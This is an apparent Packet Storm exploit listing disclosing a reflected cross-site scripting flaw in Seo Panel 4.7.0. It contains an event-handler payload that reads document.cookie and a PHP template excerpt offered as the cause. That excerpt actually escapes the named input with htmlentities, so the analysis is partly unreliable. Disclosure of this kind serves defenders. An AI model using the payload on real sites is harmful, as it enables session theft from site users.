Seo Panel 4.7.0 Cross Site Scripting

2024-04-0500:00:00
Arzu Demirez
packetstormsecurity.com
125
seo panel
cross-site scripting
remote attackers
javascript
exploit
vendor homepage
software link
AI Score
7.4
Confidence
Low
JSON
`# Exploit Title: Seo Panel 4.7.0 Reflected XSS  
# Exploit Author: Arzu DEMÝREZ  
# Date: 05.03-2024  
# Vendor Homepage: https://www.seopanel.org/  
# Software Link: https://github.com/seopanel/Seo-Panel/releases/tag/4.7.0  
# Version: Seo Panel 4.7.0  
  
  
  
-Description:  
A cross-site scripting (XSS) issue in the SEO admin login panel version 4.7.0 allows remote attackers to inject JavaScript.  
  
- used:  
x" onmouseover=alert(document.cookie) x="  
  
Review Of Analysis:  
Ýn archive.ctp.php file include search_form and search_name input load on that script at line 71 as  
<a href="javascript:void(0);" onclick="scriptDoLoadPost('archive.php', 'search_form', 'content')" class="actionbut"><?php echo $spText['button']['Search']?></a>  
because of that an attacker if send that code  
x" onmouseover=alert(document.cookie) x="  
can exploit the victim.  
  
<form id='search_form'>  
<table width="100%" class="search">  
<tr>  
<th><?php echo $spText['common']['Name']?>: </th>  
<td>  
<input type="text" name="search_name" value="<?php echo htmlentities($searchInfo['search_name'], ENT_QUOTES)?>" onblur="<?php echo $submitLink?>">  
</td>  
<th><?php echo $spText['common']['Period']?>:</th>  
<td colspan="2">  
<input type="text" value="<?php echo $fromTime?>" name="from_time" id="from_time_summary"/>  
<input type="text" value="<?php echo $toTime?>" name="to_time" id="to_time_summary"/>  
<script>  
$( function() {  
$( "#from_time_summary, #to_time_summary").datepicker({dateFormat: "yy-mm-dd"});  
} );  
</script>  
</td>  
<tr>  
<tr>  
<th><?php echo $spText['common']['Website']?>: </th>  
<td>  
<select name="website_id" id="website_id" onchange="scriptDoLoadPost('archive.php', 'search_form', 'content')" style="width: 180px;">  
<option value="">-- <?php echo $spText['common']['Select']?> --</option>  
<?php foreach($siteList as $websiteInfo){?>  
<?php if($websiteInfo['id'] == $websiteId){?>  
<option value="<?php echo $websiteInfo['id']?>" selected><?php echo $websiteInfo['name']?></option>  
<?php }else{?>  
<option value="<?php echo $websiteInfo['id']?>"><?php echo $websiteInfo['name']?></option>  
<?php }?>  
<?php }?>  
</select>  
</td>  
<th><?php echo $spText['label']['Report Type']?>: </th>  
<td>  
<select name="report_type" id="report_type" onchange="scriptDoLoadPost('archive.php', 'search_form', 'content')" style="width: 210px;">  
<option value="">-- <?php echo $spText['common']['Select']?> --</option>  
<?php foreach($reportTypes as $type => $info){?>  
<?php if($type == $searchInfo['report_type']){?>  
<option value="<?php echo $type?>" selected><?php echo $info?></option>  
<?php }else{?>  
<option value="<?php echo $type?>"><?php echo $info?></option>  
<?php }?>  
<?php }?>  
</select>  
<a href="javascript:void(0);" onclick="scriptDoLoadPost('archive.php', 'search_form', 'content')" class="actionbut"><?php echo $spText['button']['Search']?></a>  
  
  
Saygýlarýmla / Best Regards,  
  
  
  
[cid:e33e203c-58cd-46ba-b1ea-f27e999dc68d]  
`
AI Score
7.4
Confidence
Low
JSON